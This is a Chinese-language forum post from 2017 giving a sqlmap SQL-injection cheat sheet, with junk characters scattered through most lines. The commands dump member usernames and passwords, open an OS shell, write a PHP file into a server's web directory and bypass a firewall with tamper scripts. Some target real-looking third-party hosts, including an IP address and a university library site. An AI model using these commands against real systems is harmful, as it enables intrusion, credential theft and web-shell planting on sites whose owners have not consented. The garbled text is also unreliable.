/pentest/database/sqlmap4 m$ @6 `) f- d1 i
# }. {' f( I' D- b; }
update :::::> in the folder after execute following order : svn update& Q2 ~- d* k# Z- [! [
3 D1 h/ T. W5 D& u$ T3 c, Vsqlmap.py -r 1.txt --current-db
+ T `, a* B; F# q8 G% j, g) Q- X' i' R8 j4 _; K. c) L
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”& x! x7 Q. o& Q8 J" `
6 T8 }8 |2 I) D7 S, v# J# x; D==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
3 C+ O1 s9 E; J2 W) a: ~' H1 \6 ]猜解数据库; b1 T" _/ a C/ ?6 J
./sqlmap.py -u "injection-url" --dbs2 b( H6 X8 B' I0 Z' S7 S9 u$ J
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
9 E9 Z6 A, ]7 O( c
# I; A) ^5 y M. o+ C猜解表名
1 M% b" _6 y8 R2 v./sqlmap.py -u "injection-url" -D database_name --tables% a# f1 [0 n4 e m6 }. H4 L; p
# P/ Q) } S+ a$ }" \& l
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"8 m4 V7 @2 K% y! f
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" : J' O. ~ q5 D e& U& C6 W; q/ G
W0 \; y$ G7 N/ F& _+ r1 ^
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
# E" l) o( ~+ d* n/ L
7 d# C' C J/ B1 L& i$ H7 L$ P; Csqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"5 d4 r& `- B L0 a/ G v* h
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
9 \3 z% k9 C! Y+ Y1 \6 x5 Jsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
/ f* A) X4 L2 Z* Rsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"0 l4 T2 j% Z$ \( I) ^
6 h; j3 | [3 M: _* {& Gsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
, R3 i' B# F& E9 k& P2 @sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py". S& M$ b2 f# R& Y8 a6 Y# a2 y
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
$ u/ M# m, @3 v. E( z% X/ nsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py" q. _: s/ m; }
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump: ]! v9 u( x$ y
5 Y) d% ^5 Y$ m8 O1 X; [, [sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
# k( ?* [8 z. S6 k: h g( ^sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"+ F/ Z2 u6 u2 {
7 W* o0 h8 X0 J
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
( ?; Y, Y; C4 c+ r+ C( U2 N猜解列名' C: q n6 {' _& o- Q( u# {; z
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns/ O, J; ?0 S- \
& [) \/ \! Q( u
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
0 l0 c7 a2 R1 x: p' H; M- J# Csqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
+ E) z$ ^* f- W L3 X3 O6 ksqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
7 m5 d+ {; b7 A( X1 B3 i
+ b: S" ?* P2 T" ~4 Hsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"/ ~' x% p, J# ~
&submit=Go5 B( L4 z1 u2 |) M/ Z5 i9 [
猜解值7 Y: k! [7 f' J7 ^* h- i% g) W% o
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump- c1 h7 t5 F# D" R3 ?- k
========================================================' B4 N- Z* s% s# S! K+ J- ]
搜索表名中包括mana字符的
1 b! A& a& v9 U M8 Q! f C/sqlmap.py -u "injection-url" -T mana --search& e' x7 c- x9 Z: i) O
返回一个交互式sql shell
7 X) E! Q! U2 D- @/sqlmap.py -u "injection-url" --sql-shell
# p8 ^: x, w: O3 Q读取指定文件(需权限)
" K% I- _0 v9 l( m) H/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"' ]# j Q2 k7 I( P
查看当前 用户 及 数据库 $ C7 Y! V- G5 Q+ F- `) ~! H) [3 v
/sqlmap.py -u "injection-url" --current-user --current-db3 e( b/ M2 L1 X, [# N
本地文件 写入 远程目标绝对路径
1 G- I- Y2 k9 |) z; N/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径% ?( `( h( y( ~; L' a. G
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
- R3 m8 ]/ {/ o, B5 S9 F2 P. Y1 G u2 X7 P
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
% W% o- u' }: b+ n9 r查看某用的权限/ ], K1 P2 B8 W9 ^6 \
/sqlmap.py -u "injection-url" --privileges -U root
# o& [6 w! o! r' o( ]9 D查看当前用户是否为dba J: L0 I3 V2 [5 E7 m9 k2 ?2 {4 R
/sqlmap.py -u "injection-url" --is-dba6 Q# `1 d2 N+ Z9 J& z/ U
读取所有数据库用户或指定数据库用户的密码
4 `. t t4 v0 x/ N& esqlmap.py -r 1.txt --users --passwords
- q. L) R/ q( ]! ]) \. c) D0 Zsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 3 H, W# i! X0 {# P
, G0 f# D7 m+ [" o! i. y( Z* Y0 z
/sqlmap.py -u "injection-url" --passwords -U root
) U( A0 P% }6 T. |7 |
3 S. o( V! B7 B) C" [& H. F1 U--start&&--stop 与 --first&&--last 的区别 @2 n2 S$ y5 M" \9 q
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
: {3 l y4 a, k0 L1 @
9 l: D3 \: r! [从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
% f# n+ v) C5 V1 J/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
4 y5 C9 W' O# J+ r$ f/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
. t, I1 X' \8 Z( x* Z! |1 x6 W$ I* w( [0 D4 L
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)8 E! {0 _% y; t
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
9 d H+ O1 i3 j8 M
' r+ a" D! |) n |
发表于 2017-5-19 17:03:10
收藏
支持
反对